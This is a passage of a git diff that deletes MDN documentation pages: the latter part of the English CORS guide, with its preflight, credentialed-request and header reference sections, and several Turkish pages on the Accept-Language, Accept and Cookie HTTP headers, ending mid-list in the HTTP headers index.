{{HTTPHeader("Access-Control-Request-Headers")}} header notifies the server that when the actual request is sent, it will be sent with a <code>X-PINGOTHER</code> and <code>Content-Type</code> custom headers. The server now has an opportunity to determine whether it wishes to accept a request under these circumstances.</p> - -<p>Lines 14 - 26 above are the response that the server sends back indicating that the request method (<code>POST</code>) and request headers (<code>X-PINGOTHER</code>) are acceptable. In particular, let's look at lines 17-20:</p> - -<pre class="brush: none">Access-Control-Allow-Origin: http://foo.example -Access-Control-Allow-Methods: POST, GET -Access-Control-Allow-Headers: X-PINGOTHER, Content-Type -Access-Control-Max-Age: 86400</pre> - -<p>The server responds with <code>Access-Control-Allow-Methods</code> and says that <code>POST</code> and <code>GET</code> are viable methods to query the resource in question. Note that this header is similar to the {{HTTPHeader("Allow")}} response header, but used strictly within the context of access control.</p> - -<p>The server also sends <code>Access-Control-Allow-Headers</code> with a value of "<code>X-PINGOTHER, Content-Type</code>", confirming that these are permitted headers to be used with the actual request. Like <code>Access-Control-Allow-Methods</code>, <code>Access-Control-Allow-Headers</code> is a comma separated list of acceptable headers.</p> - -<p>Finally, {{HTTPHeader("Access-Control-Max-Age")}} gives the value in seconds for how long the response to the preflight request can be cached for without sending another preflight request. In this case, 86400 seconds is 24 hours. Note that each browser has a <a href="/en-US/docs/Web/HTTP/Headers/Access-Control-Max-Age">maximum internal value</a> that takes precedence when the <code>Access-Control-Max-Age</code> is greater.</p> - -<h4 id="Preflighted_requests_and_redirects">Preflighted requests and redirects</h4> - -<p>Not all browsers currently support following redirects after a preflighted request. If a redirect occurs after a preflighted request, some browsers currently will report an error message such as the following.</p> - -<blockquote> -<p>The request was redirected to 'https://example.com/foo', which is disallowed for cross-origin requests that require preflight</p> -</blockquote> - -<blockquote> -<p>Request requires preflight, which is disallowed to follow cross-origin redirect</p> -</blockquote> - -<p>The CORS protocol originally required that behavior but <a href="https://github.com/whatwg/fetch/commit/0d9a4db8bc02251cc9e391543bb3c1322fb882f2">was subsequently changed to no longer require it</a>. However, not all browsers have implemented the change, and so still exhibit the behavior that was originally required.</p> - -<p>So until all browsers catch up with the spec, you may be able to work around this limitation by doing one or both of the following:</p> - -<ul> - <li>change the server-side behavior to avoid the preflight and/or to avoid the redirect—if you have control over the server the request is being made to</li> - <li>change the request such that it is a <a href="#Simple_requests">simple request</a> that doesn’t cause a preflight</li> -</ul> - -<p>But if it’s not possible to make those changes, then another way that may be possible is to this:</p> - -<ol> - <li>Make a <a href="#Simple_requests">simple request</a> (using {{domxref("Response.url")}} for the Fetch API, or {{domxref("XMLHttpRequest.responseURL")}}) to determine what URL the real preflighted request would end up at.</li> - <li>Make another request (the “real” request) using the URL you obtained from <code>Response.url</code> or <code>XMLHttpRequest.responseURL</code> in the first step.</li> -</ol> - -<p>However, if the request is one that triggers a preflight due to the presence of the <code>Authorization</code> header in the request, you won’t be able to work around the limitation using the steps above. And you won’t be able to work around it at all unless you have control over the server the request is being made to.</p> - -<h3 id="Requests_with_credentials">Requests with credentials</h3> - -<p>The most interesting capability exposed by both {{domxref("XMLHttpRequest")}} or <a href="/en-US/docs/Web/API/Fetch_API">Fetch</a> and CORS is the ability to make "credentialed" requests that are aware of <a href="/en-US/docs/Web/HTTP/Cookies">HTTP cookies</a> and HTTP Authentication information. By default, in cross-site <code>XMLHttpRequest</code> or <a href="/en-US/docs/Web/API/Fetch_API">Fetch</a> invocations, browsers will <strong>not</strong> send credentials. A specific flag has to be set on the <code>XMLHttpRequest</code> object or the {{domxref("Request")}} constructor when it is invoked.</p> - -<p>In this example, content originally loaded from <code class="plain">http://foo.example</code> makes a simple GET request to a resource on <code class="plain">http://bar.other</code> which sets Cookies. Content on foo.example might contain JavaScript like this:</p> - -<pre class="brush: js" id="line1">const invocation = new XMLHttpRequest(); -const url = 'http://bar.other/resources/credentialed-content/'; - -function callOtherDomain(){ - if(invocation) { - invocation.open('GET', url, true); - invocation.withCredentials = true; - invocation.onreadystatechange = handler; - invocation.send(); - } -}</pre> - -<p>Line 7 shows the flag on {{domxref("XMLHttpRequest")}} that has to be set in order to make the invocation with Cookies, namely the <code>withCredentials</code> boolean value. By default, the invocation is made without Cookies. Since this is a simple <code>GET</code> request, it is not preflighted, but the browser will <strong>reject</strong> any response that does not have the {{HTTPHeader("Access-Control-Allow-Credentials")}}<code>: true</code> header, and <strong>not</strong> make the response available to the invoking web content.</p> - -<p><img alt="" src="https://mdn.mozillademos.org/files/14291/cred-req.png" style="height: 223px; width: 521px;"></p> - -<p>Here is a sample exchange between client and server:</p> - -<pre class="brush: none">GET /resources/access-control-with-credentials/ HTTP/1.1 -Host: bar.other -User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1b3pre) Gecko/20081130 Minefield/3.1b3pre -Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 -Accept-Language: en-us,en;q=0.5 -Accept-Encoding: gzip,deflate -Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 -Connection: keep-alive -Referer: http://foo.example/examples/credential.html -Origin: http://foo.example -Cookie: pageAccess=2 - - -HTTP/1.1 200 OK -Date: Mon, 01 Dec 2008 01:34:52 GMT -Server: Apache/2.0.61 (Unix) PHP/4.4.7 mod_ssl/2.0.61 OpenSSL/0.9.7e mod_fastcgi/2.4.2 DAV/2 SVN/1.4.2 -X-Powered-By: PHP/5.2.6 -Access-Control-Allow-Origin: http://foo.example -Access-Control-Allow-Credentials: true -Cache-Control: no-cache -Pragma: no-cache -Set-Cookie: pageAccess=3; expires=Wed, 31-Dec-2008 01:34:53 GMT -Vary: Accept-Encoding, Origin -Content-Encoding: gzip -Content-Length: 106 -Keep-Alive: timeout=2, max=100 -Connection: Keep-Alive -Content-Type: text/plain - - -[text/plain payload] -</pre> - -<p>Although line 11 contains the Cookie destined for the content on <code class="plain">http://bar.other</code>, if bar.other did not respond with an {{HTTPHeader("Access-Control-Allow-Credentials")}}<code>: true</code> (line 19) the response would be ignored and not made available to web content.</p> - -<h4 id="Credentialed_requests_and_wildcards">Credentialed requests and wildcards</h4> - -<p>When responding to a credentialed request, the server <strong>must</strong> specify an origin in the value of the <code>Access-Control-Allow-Origin</code> header, instead of specifying the "<code>*</code>" wildcard.</p> - -<p>Because the request headers in the above example include a <code>Cookie</code> header, the request would fail if the value of the <code>Access-Control-Allow-Origin</code> header were "*". But it does not fail: Because the value of the <code>Access-Control-Allow-Origin</code> header is "<code class="plain">http://foo.example</code>" (an actual origin) rather than the "<code>*</code>" wildcard, the credential-cognizant content is returned to the invoking web content.</p> - -<p>Note that the <code>Set-Cookie</code> response header in the example above also sets a further cookie. In case of failure, an exception—depending on the API used—is raised.</p> - -<h4 id="Third-party_cookies">Third-party cookies</h4> - -<p>Note that cookies set in CORS responses are subject to normal third-party cookie policies. In the example above, the page is loaded from <code>foo.example</code>, but the cookie on line 22 is sent by <code>bar.other</code>, and would thus not be saved if the user has configured their browser to reject all third-party cookies.</p> - -<h2 id="The_HTTP_response_headers">The HTTP response headers</h2> - -<p>This section lists the HTTP response headers that servers send back for access control requests as defined by the Cross-Origin Resource Sharing specification. The previous section gives an overview of these in action.</p> - -<h3 id="Access-Control-Allow-Origin">Access-Control-Allow-Origin</h3> - -<p>A returned resource may have one {{HTTPHeader("Access-Control-Allow-Origin")}} header, with the following syntax:</p> - -<pre class="brush: none">Access-Control-Allow-Origin: <origin> | * -</pre> - -<p><code>Access-Control-Allow-Origin</code> specifies either a single origin, which tells browsers to allow that origin to access the resource; or else — for requests <strong>without</strong> credentials — the "<code>*</code>" wildcard, to tell browsers to allow any origin to access the resource.</p> - -<p>For example, to allow code from the origin <code>http://mozilla.org</code> to access the resource, you can specify:</p> - -<pre class="brush: none">Access-Control-Allow-Origin: http://mozilla.org</pre> - -<p>If the server specifies a single origin rather than the "<code>*</code>" wildcard, then the server should also include <code>Origin</code> in the {{HTTPHeader("Vary")}} response header — to indicate to clients that server responses will differ based on the value of the {{HTTPHeader("Origin")}} request header.</p> - -<h3 id="Access-Control-Expose-Headers">Access-Control-Expose-Headers</h3> - -<p>The {{HTTPHeader("Access-Control-Expose-Headers")}} header lets a server whitelist headers that browsers are allowed to access. For example:</p> - -<pre class="brush: none">Access-Control-Expose-Headers: X-My-Custom-Header, X-Another-Custom-Header -</pre> - -<p>This allows the <code>X-My-Custom-Header</code> and <code>X-Another-Custom-Header</code> headers to be exposed to the browser.</p> - -<h3 id="Access-Control-Max-Age">Access-Control-Max-Age</h3> - -<p>The {{HTTPHeader("Access-Control-Max-Age")}} header indicates how long the results of a preflight request can be cached. For an example of a preflight request, see the above examples.</p> - -<pre class="brush: none">Access-Control-Max-Age: <delta-seconds> -</pre> - -<p>The <code>delta-seconds</code> parameter indicates the number of seconds the results can be cached.</p> - -<h3 id="Access-Control-Allow-Credentials">Access-Control-Allow-Credentials</h3> - -<p>The {{HTTPHeader("Access-Control-Allow-Credentials")}} header Indicates whether or not the response to the request can be exposed when the <code>credentials</code> flag is true. When used as part of a response to a preflight request, this indicates whether or not the actual request can be made using credentials. Note that simple <code>GET</code> requests are not preflighted, and so if a request is made for a resource with credentials, if this header is not returned with the resource, the response is ignored by the browser and not returned to web content.</p> - -<pre class="brush: none">Access-Control-Allow-Credentials: true -</pre> - -<p><a class="internal" href="#Requests_with_credentials">Credentialed requests</a> are discussed above.</p> - -<h3 id="Access-Control-Allow-Methods">Access-Control-Allow-Methods</h3> - -<p>The {{HTTPHeader("Access-Control-Allow-Methods")}} header specifies the method or methods allowed when accessing the resource. This is used in response to a preflight request. The conditions under which a request is preflighted are discussed above.</p> - -<pre class="brush: none">Access-Control-Allow-Methods: <method>[, <method>]* -</pre> - -<p>An example of a <a class="internal" href="#Preflighted_requests">preflight request is given above</a>, including an example which sends this header to the browser.</p> - -<h3 id="Access-Control-Allow-Headers">Access-Control-Allow-Headers</h3> - -<p>The {{HTTPHeader("Access-Control-Allow-Headers")}} header is used in response to a <a class="internal" href="#Preflighted_requests">preflight request</a> to indicate which HTTP headers can be used when making the actual request.</p> - -<pre class="brush: none">Access-Control-Allow-Headers: <field-name>[, <field-name>]* -</pre> - -<h2 id="The_HTTP_request_headers">The HTTP request headers</h2> - -<p>This section lists headers that clients may use when issuing HTTP requests in order to make use of the cross-origin sharing feature. Note that these headers are set for you when making invocations to servers. Developers using cross-site {{domxref("XMLHttpRequest")}} capability do not have to set any cross-origin sharing request headers programmatically.</p> - -<h3 id="Origin">Origin</h3> - -<p>The {{HTTPHeader("Origin")}} header indicates the origin of the cross-site access request or preflight request.</p> - -<pre class="brush: none">Origin: <origin> -</pre> - -<p>The origin is a URI indicating the server from which the request initiated. It does not include any path information, but only the server name.</p> - -<div class="note"><strong>Note:</strong> The <code>origin</code> can be the empty string; this is useful, for example, if the source is a <code>data</code> URL.</div> - -<p>Note that in any access control request, the {{HTTPHeader("Origin")}} header is <strong>always</strong> sent.</p> - -<h3 id="Access-Control-Request-Method">Access-Control-Request-Method</h3> - -<p>The {{HTTPHeader("Access-Control-Request-Method")}} is used when issuing a preflight request to let the server know what HTTP method will be used when the actual request is made.</p> - -<pre class="brush: none">Access-Control-Request-Method: <method> -</pre> - -<p>Examples of this usage can be <a class="internal" href="#Preflighted_requests">found above.</a></p> - -<h3 id="Access-Control-Request-Headers">Access-Control-Request-Headers</h3> - -<p>The {{HTTPHeader("Access-Control-Request-Headers")}} header is used when issuing a preflight request to let the server know what HTTP headers will be used when the actual request is made.</p> - -<pre class="brush: none">Access-Control-Request-Headers: <field-name>[, <field-name>]* -</pre> - -<p>Examples of this usage can be <a class="internal" href="#Preflighted_requests">found above</a>.</p> - -<h2 id="Specifications">Specifications</h2> - -<table class="standard-table"> - <tbody> - <tr> - <th scope="col">Specification</th> - <th scope="col">Status</th> - <th scope="col">Comment</th> - </tr> - <tr> - <td>{{SpecName('Fetch', '#cors-protocol', 'CORS')}}</td> - <td>{{Spec2('Fetch')}}</td> - <td>New definition; supplants <a href="https://www.w3.org/TR/cors/">W3C CORS</a> specification.</td> - </tr> - </tbody> -</table> - -<h2 id="Browser_compatibility">Browser compatibility</h2> - -<p class="hidden">The compatibility table in this page is generated from structured data. If you'd like to contribute to the data, please check out <a href="https://github.com/mdn/browser-compat-data">https://github.com/mdn/browser-compat-data</a> and send us a pull request.</p> - -<p>{{Compat("http.headers.Access-Control-Allow-Origin")}}</p> - -<h3 id="Compatibility_notes">Compatibility notes</h3> - -<ul> - <li>Internet Explorer 8 and 9 expose CORS via the <code>XDomainRequest</code> object, but have a full implementation in IE 10.</li> - <li>While Firefox 3.5 introduced support for cross-site <code>XMLHttpRequests</code> and Web Fonts, certain requests were limited until later versions. Specifically, Firefox 7 introduced the ability for cross-site HTTP requests for WebGL Textures, and Firefox 9 added support for Images drawn on a canvas using <code>drawImage()</code>.</li> -</ul> - -<h2 id="See_also">See also</h2> - -<ul> - <li><a href="/en-US/docs/Web/HTTP/CORS/Errors">CORS errors</a></li> - <li><a href="https://enable-cors.org/server.html">Enable CORS: I want to add CORS support to my server</a></li> - <li>{{domxref("XMLHttpRequest")}}</li> - <li><a href="/en-US/docs/Web/API/Fetch_API">Fetch API</a></li> - <li><a class="external" href="http://www.kendoui.com/blogs/teamblog/posts/11-10-03/using_cors_with_all_modern_browsers.aspx">Using CORS with All (Modern) Browsers</a></li> - <li><a href="http://www.html5rocks.com/en/tutorials/cors/">Using CORS - HTML5 Rocks</a> - <ul> - </ul> - </li> - <li><a class="external" href="https://arunranga.com/examples/access-control/">Code Samples Showing <code>XMLHttpRequest</code> and Cross-Origin Resource Sharing</a></li> - <li><a href="https://github.com/jackblackevo/cors-jsonp-sample">Client-Side & Server-Side (Java) sample for Cross-Origin Resource Sharing (CORS)</a></li> - <li><a class="internal" href="/en-US/docs/Web/HTTP/Server-Side_Access_Control">Cross-Origin Resource Sharing From a Server-Side Perspective (PHP, etc.)</a></li> - <li><a href="https://stackoverflow.com/questions/43871637/no-access-control-allow-origin-header-is-present-on-the-requested-resource-whe/43881141#43881141">Stack Overflow answer with “how to” info for dealing with common problems</a>: - <ul> - <li>How to avoid the CORS preflight</li> - <li>How to use a CORS proxy to get around <em>“No Access-Control-Allow-Origin header”</em></li> - <li>How to fix <em>“Access-Control-Allow-Origin header must not be the wildcard”</em></li> - </ul> - </li> -</ul> - -<div>{{HTTPSidebar}}</div> diff --git a/files/tr/web/http/headers/accept-language/index.html b/files/tr/web/http/headers/accept-language/index.html deleted file mode 100644 index fb3fe1dbe4..0000000000 --- a/files/tr/web/http/headers/accept-language/index.html +++ /dev/null @@ -1,97 +0,0 @@ ---- -title: Accept-Language -slug: Web/HTTP/Headers/Accept-Language -tags: - - HTTP Başlığı - - İçerik görüşmesi -translation_of: Web/HTTP/Headers/Accept-Language ---- -<div>{{HTTPSidebar}}</div> - -<p><strong><code>Accept-Language</code></strong> HTTP başlığı, istemcinin hangi dilleri anlayabildiğini ve hangi dil türünün tercih edildiğini bildirir. (Burada dil derken programlama dili değil, İngilizce gibi doğal dillerden bahsediyoruz.) Sunucu i<a href="/tr/docs/Web/HTTP/Content_negotiation">çerik görüşmesi</a> kullanarak bu önerilerden birini seçip kullanır ve {{HTTPHeader("Content-Language")}} yanıt başlığı aracılığıyla istemciye seçtiği dili bildirir. Tarayıcılar kullanıcı arayüzü diline bakarak bu başlığa uygun değerleri verir ve kullanıcı bunu değiştirebilse de bu pek sık olmaz (ve parmak izine neden olduğundan hoş karşılanmaz).</p> - -<p>Bu başlık, sunucunun kullanıcı tarafından bilinçli olarak belirtilmiş bir URL gibi herhangi bir yoldan dil berlirleme imkanı olmadığında kullanması için verilen bir ipucudur. Sunucunun asla bilinçli bir seçimi geçersiz kılmaması önerilmektedir. <code>Accept-Language</code> içeriği genellikle kullanıcının kontrolünde değildir (örneğin seyahat ederken başka bir ülkede bir internet kafeyi kullanmak gibi); kullanıcı kendi kullanıcı arayüzünün dili dışında bir dilde de sayfayı görüntülemek isteyebilir.</p> - -<p>Eğer sunucu eşleşen hiçbir dilde hizmet veremiyorsa, teoride bir {{HTTPStatus("406")}} (Kabul edilemez) hata kodunu döndürebilir. Ancak, daha iyi bir kullanıcı deneyimi sağlanması için bu nadiren yapılır ve bu durumda genellikle <code>Accept-Language</code> başlığı görmezden gelinir.</p> - -<table class="properties"> - <tbody> - <tr> - <th scope="row">Başlık türü</th> - <td>{{Glossary("Request header")}}</td> - </tr> - <tr> - <th scope="row">{{Glossary("Forbidden header name")}}</th> - <td>hayır</td> - </tr> - <tr> - <th scope="row">{{Glossary("Simple header", "CORS-safelisted request-header")}}</th> - <td>evet</td> - </tr> - </tbody> -</table> - -<h2 id="Sözdizimi">Sözdizimi</h2> - -<pre class="syntaxbox">Accept-Language: <language> -Accept-Language: * - -// {{glossary("quality values", "quality value")}} sözdizimi ile ağırlıklandırılmış birden fazla dil var: -Accept-Language: fr-CH, fr;q=0.9, en;q=0.8, de;q=0.7, *;q=0.5</pre> - -<h2 id="Direktifler">Direktifler</h2> - -<dl> - <dt><code><language></code></dt> - <dd> - <p>Bir dil etiketi (bazen "yerel ayar kimliği" olarak da adlandırılır). Bu direktif 2-3 harften oluşan ve dili demsil eden bir temel dil etiketidir, isteğe bağlı olarak ardından <code>'-'</code> ile ayrılan ek alt etiketler gelebilir. En sık kullanılan ek bilgi ülke veya bölge varyantı (<code>'en-US'</code> veya <code>'fr-CA'</code> gibi) ya da kullanılacak alfabe türüdür (<code>'sr-Latn'</code> gibi). Yazım türü (<code>'de-DE-1996'</code>) gibi diğer varyantlar genellikle bu başlık kapsamında kullanılmaz.</p> - </dd> - <dt><code>*</code></dt> - <dd>Herhangi bir dil; <code>'*'</code> joker karakter olarak kullanılır.</dd> - <dt><code>;q=</code> (q-faktör ağırlıklandırması)</dt> - <dd>Tercih sırasına göre yerleştirilen herhangi bir değer, <em>ağırlık </em>denilen göreceli bir {{glossary("Quality values", "quality value")}} ile ifade edilir.</dd> -</dl> - -<h2 id="Örnekler">Örnekler</h2> - -<pre>Accept-Language: de - -Accept-Language: de-CH - -Accept-Language: en-US,en;q=0.5 -</pre> - -<h2 id="Özellikler">Özellikler</h2> - -<table class="standard-table"> - <thead> - <tr> - <th scope="col">Özellik</th> - <th scope="col">Başlık</th> - </tr> - </thead> - <tbody> - <tr> - <td>{{RFC("7231", "Accept-Language", "5.3.5")}}</td> - <td>Hypertext Transfer Protocol (HTTP/1.1): Anlambilim ve Bağlam</td> - </tr> - <tr> - <td><a href="https://tools.ietf.org/html/bcp47">BCP 47</a></td> - <td>Dilin Belirlenmesi için Etiketler</td> - </tr> - </tbody> -</table> - -<h2 id="Tarayıcı_uyumluluğu">Tarayıcı uyumluluğu</h2> - -<p class="hidden"><span class="tlid-translation translation" lang="tr">Bu sayfadaki uyumluluk tablosu yapılandırılmış verilerden üretilmiştir. Verilere katkıda bulunmak istiyorsanız, lütfen</span> <a href="https://github.com/mdn/browser-compat-data">https://github.com/mdn/browser-compat-data</a> <span class="tlid-translation translation" lang="tr"> adresini ziyaret edin ve bize bir çekme isteği gönderin.</span></p> - -<p>{{Compat("http.headers.Accept-Language")}}</p> - -<h2 id="Bakınız">Bakınız</h2> - -<ul> - <li>HTTP <a href="/tr/docs/Web/HTTP/Content_negotiation">içerik görüşmesi</a></li> - <li>İçerik görüşmesinin sonucunu içeren başlık: {{HTTPHeader("Content-Language")}}</li> - <li>Diğer benzer başlıklar: {{HTTPHeader("TE")}}, {{HTTPHeader("Accept-Encoding")}}, {{HTTPHeader("Accept-Charset")}}, {{HTTPHeader("Accept")}}</li> -</ul> diff --git a/files/tr/web/http/headers/accept/index.html b/files/tr/web/http/headers/accept/index.html deleted file mode 100644 index 85ffcc2b40..0000000000 --- a/files/tr/web/http/headers/accept/index.html +++ /dev/null @@ -1,99 +0,0 @@ ---- -title: Accept -slug: Web/HTTP/Headers/Accept -tags: - - HTTP - - HTTP Başlığı - - Referans - - İstek başlığı -translation_of: Web/HTTP/Headers/Accept ---- -<p>{{HTTPSidebar}}</p> - -<p>Accept <strong><code>HTTP</code></strong> başlığı, istemcinin hangi içerik tiplerini(<a href="https://wiki.developer.mozilla.org/en-US/docs/Web/HTTP/Basics_of_HTTP/MIME_types">MIME types</a>) anlayabileceğini sunucuya söyler. Sunucu <a href="https://wiki.developer.mozilla.org/en-US/docs/Web/HTTP/Content_negotiation">content negotiation</a> kullanarak bu tiplerden birini seçer ve istemciye {{HTTPHeader("Content-Type")}} başlığı ile seçimini gönderir. Tarayıcılar bu başlığın belirttiği içerik tipine göre gerekli değerleri ayarlar. CSS, resim, video veya script dosyaları için farklı değerler ayarlanır.</p> - -<table class="properties"> - <tbody> - <tr> - <th scope="row">Başlık türü</th> - <td> - <p>{{Glossary("Request header")}}</p> - </td> - </tr> - <tr> - <th scope="row">{{Glossary("Forbidden header name")}}</th> - <td>hayır</td> - </tr> - <tr> - <th scope="row">{{Glossary("CORS-safelisted request header")}}</th> - <td>Evet ama CORS-güvensiz başlık baytlarını içermemelidir: 0x00-0x1F(0x09 (HT) hariç), <code>"():<>?@[\]{}</code> ve 0x7F(DEL).</td> - </tr> - </tbody> -</table> - -<h2 id="Söz_Dizimi">Söz Dizimi</h2> - -<pre class="syntaxbox notranslate">Accept: <MIME_type>/<MIME_subtype> -Accept: <MIME_type>/* -Accept: */* - -// Çok tipli, <a href="https://developer.mozilla.org/en-US/docs/Glossary/quality_values">ağırlık</a> belirtilebilir söz dizimi: -Accept: text/html, application/xhtml+xml, application/xml;q=0.9, image/webp, */*;q=0.8 -</pre> - -<h2 id="Komutlar">Komutlar</h2> - -<dl> - <dt><code><MIME_type>/<MIME_subtype></code></dt> - <dd>Tek <a href="/en-US/docs/Web/HTTP/Basics_of_HTTP/MIME_types">MIME tip</a>, mesela <code>text/html</code>.</dd> - <dt><code><MIME_type>/*</code></dt> - <dd>Bir MIME tip altında herhangi bir alt tip. <code>image/*</code> tipi <code>image/png</code>, <code>image/svg</code>, <code>image/gif</code> tiplerini kapsar.</dd> - <dt><code>*/*</code></dt> - <dd>Herhangi bir MIME tip</dd> - <dt><code>;q=</code> (ağırlık)</dt> - <dd>Sıralamayı belirtmek için <a href="/en-US/docs/Glossary/Quality_values">ağırlık</a> denilen bir değer kullanılabilir.</dd> -</dl> - -<h2 id="Örnekler">Örnekler</h2> - -<pre class="notranslate">Accept: text/html - -Accept: image/* - -// Çoğu tarayıcıda varsayılan olarak gönderilir -Accept: */* - -// Gezinme için varsayılan -Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8 -</pre> - -<h2 id="Şartname">Şartname</h2> - -<table class="standard-table"> - <thead> - <tr> - <th scope="col">Şartname</th> - <th scope="col">İsim</th> - </tr> - </thead> - <tbody> - <tr> - <td>{{RFC("7231", "Accept", "5.3.2")}}</td> - <td>Hypertext Transfer Protocol (HTTP/1.1): Semantics and Context</td> - </tr> - </tbody> -</table> - -<h2 id="Tarayıcı_uyumluluğu">Tarayıcı uyumluluğu</h2> - -<p class="hidden">Uyumluluk tablosu hazır verilerden otomatik olarak oluşturulmuştur. Eğer bu verilere katkı yapmak isterseniz lütfen <a href="https://github.com/mdn/browser-compat-data">https://github.com/mdn/browser-compat-data</a> adresini inceleyin.</p> - -<p>{{Compat("http.headers.Accept")}}</p> - -<h2 id="İlişkili_konular">İlişkili konular</h2> - -<ul> - <li>HTTP <a href="/en-US/docs/Web/HTTP/Content_negotiation">content negotiation</a></li> - <li>Content negotiation sonucunu belirten başlık: {{HTTPHeader("Content-Type")}}</li> - <li>Diğer benzer başlıklar: {{HTTPHeader("TE")}}, {{HTTPHeader("Accept-Encoding")}}, {{HTTPHeader("Accept-Charset")}}, {{HTTPHeader("Accept-Language")}}</li> -</ul> diff --git a/files/tr/web/http/headers/cookie/index.html b/files/tr/web/http/headers/cookie/index.html deleted file mode 100644 index dd0338e648..0000000000 --- a/files/tr/web/http/headers/cookie/index.html +++ /dev/null @@ -1,71 +0,0 @@ ---- -title: Çerez -slug: Web/HTTP/Headers/Cookie -tags: - - HTTP - - Çerez -translation_of: Web/HTTP/Headers/Cookie ---- -<div>{{HTTPSidebar}}</div> - -<p><strong><code>Cookie</code></strong><span class="tlid-translation translation" lang="tr"> HTTP istek başlığı, daha önce sunucu tarafından {{HTTPHeader ("Set-Cookie")}} başlığıyla gönderilip tarayıcıda saklanmış olan </span><a href="/tr/docs/Web/HTTP/Cookies">HTTP çerezlerini</a><span class="tlid-translation translation" lang="tr"> içerir.</span></p> - -<p><code>Cookie</code><span class="tlid-translation translation" lang="tr"> başlığı isteğe bağlıdır ve örneğin tarayıcının gizlilik ayarları çerezleri engellediğinde gözardı edilebilir.</span></p> - -<table class="properties"> - <tbody> - <tr> - <th scope="row">Başlık türü</th> - <td>{{Glossary("Request header")}}</td> - </tr> - <tr> - <th scope="row">{{Glossary("Forbidden header name")}}</th> - <td>evet</td> - </tr> - </tbody> -</table> - -<h2 id="Sözdizimi">Sözdizimi</h2> - -<pre class="syntaxbox">Cookie: <cerez-listesi> -Cookie: ad=deger -Cookie: ad=deger; ad2=deger2; ad3=deger3</pre> - -<dl> - <dt><cookie-list></dt> - <dd><code><cookie-adi>=<cookie-degeri></code><span class="tlid-translation translation" lang="tr"> biçimindeki ad ve değer çiftlerinden oluşan bir liste. Listedeki çiftler noktalı virgül ve boşlukla </span>(<code>'; '</code>) <span class="tlid-translation translation" lang="tr">ayrılır.</span></dd> -</dl> - -<h2 id="Örnekler">Örnekler</h2> - -<pre>Cookie: PHPSESSID=298zf09hf012fh2; csrftoken=u32t4o3tb3gg43; _gat=1;</pre> - -<h2 id="Specifications">Specifications</h2> - -<table class="standard-table"> - <thead> - <tr> - <th scope="col">Tanım</th> - <th scope="col">Başlık</th> - </tr> - </thead> - <tbody> - <tr> - <td>{{RFC("6265", "Cookie", "5.4")}}</td> - <td>HTTP State Management Mechanism</td> - </tr> - </tbody> -</table> - -<h2 id="Tarayıcı_uyumluluğu">Tarayıcı uyumluluğu</h2> - -<p class="hidden"><span class="tlid-translation translation" lang="tr">Bu sayfadaki uyumluluk tablosu yapılandırılmış verilerden üretilmiştir. Verilere katkıda bulunmak istiyorsanız, lütfen </span> <a href="https://github.com/mdn/browser-compat-data">https://github.com/mdn/browser-compat-data</a><span class="tlid-translation translation" lang="tr"> adresini ziyaret edin ve bize bir çekme isteği gönderin.</span></p> - -<p>{{Compat("http.headers.Cookie")}}</p> - -<h2 id="Bakınız">Bakınız</h2> - -<ul> - <li>{{HTTPHeader("Set-Cookie")}}</li> - <li>{{domxref("Document.cookie")}}</li> -</ul> diff --git a/files/tr/web/http/headers/index.html b/files/tr/web/http/headers/index.html deleted file mode 100644 index e117a7583b..0000000000 --- a/files/tr/web/http/headers/index.html +++ /dev/null @@ -1,370 +0,0 @@ ---- -title: HTTP başlıkları -slug: Web/HTTP/Headers -tags: - - HTTP - - Headers - - NeedsTranslation - - Networking - - Reference - - TopicStub -translation_of: Web/HTTP/Headers ---- -<div>{{HTTPSidebar}}</div> - -<p><span class="tlid-translation translation" lang="tr">HTTP başlıkları, istemci ve sunucunun istek veya yanıtla birlikte ek bilgiler iletebilmesini sağlar. Bir istek başlığı, büyük/küçük harfe duyarsız olarak başlığın adı, iki nokta üst üste </span> '<code>:</code>'<span class="tlid-translation translation" lang="tr">, ve ardından değeri (satır sonu karakterleri içermeden) şeklindedir. Değerden önceki boşluk karakterleri dikkate alınmaz.</span></p> - -<p><span class="tlid-translation translation" lang="tr">'X-' öneki kullanılarak çeşitli özel başlıklar eklenebilir, ancak standart olmayan alanların </span><a href="https://tools.ietf.org/html/rfc6648">RFC 6648</a><span class="tlid-translation translation" lang="tr">'de standart hale gelmesinin neden olduğu rahatsızlıklardan dolayı bu uygulama Haziran 2012'de kaldırılmıştır; diğerleri ise asıl içeriği </span><a class="external" href="http://tools.ietf.org/html/rfc4229">RFC 4229</a><span class="tlid-translation translation" lang="tr">'da tanımlanan bir </span><a class="external" href="http://www.iana.org/assignments/message-headers/perm-headers.html">IANA kayıt defteri</a><span class="tlid-translation translation" lang="tr">'nde listelenmiştir. IANA, <a href="http://www.iana.org/assignments/message-headers/prov-headers.html">önerilen yeni HTTP mesaj başlıkları kaydını</a> da tutmaktadır.</span></p> - -<p>Başlık bilgileri bağlamlarına (context) göre gruplanabilir:</p> - -<ul> - <li>{{Glossary("General header")}}: Başlık bilgileri hem isteklerde hem de yanıtlarda görülür. Başlık bilgileri gövde hakkında direktifler içerir.</li> - <li>{{Glossary("Request header")}}: Çekilen kaynak veya istemci hakkında daha fazla bilgi içeren başlık bilgileridir. Sunucuya gönderilir.</li> - <li>{{Glossary("Response header")}}: Sunucudan alınan yanıt hakkında ek bilgi içeren başlık bilgileridir. Örneğin sunucuya yapılan istek sonucu veya sunucu hakkında bilgi içerir. Tarayıcıya gelir.</li> - <li>{{Glossary("Entity header")}}: Entity gövdesi hakkında daha fazla bilgi içeren başlık bilgileridir. Örneğin MIME-tipi veya içerik uzunluğu.</li> -</ul> - -<p>Başlık bilgileri aynı zamanda vekil sunucuların bunları nasıl ele aldığına göre de gruplanabilir:</p> - -<dl> - <dt><a id="e2e" name="e2e"></a>Uçtan-uca başlık bilgileri (End-to-end headers)</dt> - <dd>These headers must be transmitted to the final recipient of the message; that is, the server for a request or the client for a response. Intermediate proxies must retransmit end-to-end headers unmodified and caches must store them.</dd> - <dt><a id="hbh" name="hbh"></a>Hop-by-hop headers</dt> - <dd>These headers are meaningful only for a single transport-level connection and must not be retransmitted by proxies or cached. Such headers are: {{ httpheader("Connection") }}, {{ httpheader("Keep-Alive") }}, {{ httpheader("Proxy-Authenticate") }}, {{ httpheader("Proxy-Authorization") }}, {{ httpheader("TE") }}, {{ httpheader("Trailer") }}, {{ 